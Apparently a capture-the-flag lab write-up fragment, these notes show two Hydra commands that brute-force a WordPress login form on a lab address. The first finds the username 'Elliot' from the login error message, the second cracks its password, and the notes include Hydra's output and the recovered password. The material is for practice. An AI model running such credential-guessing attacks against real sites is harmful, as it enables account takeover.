"to find the username"

hydra -L fsocity.dic -p test 10.10.235.128 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -t 30 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-20 11:15:06
[DATA] max 30 tasks per 1 server, overall 30 tasks, 357037 login tries (l:357037/p:1), ~11902 tries per task
[DATA] attacking http-post-form://10.10.235.128:80/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username
[80][http-post-form] host: 10.10.235.128   login: Elliot   password: test

"to find the password"
hydra -l Elliot  -P fsocity.dic 10.10.235.128 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for" -t 30

pass : ER28-0652
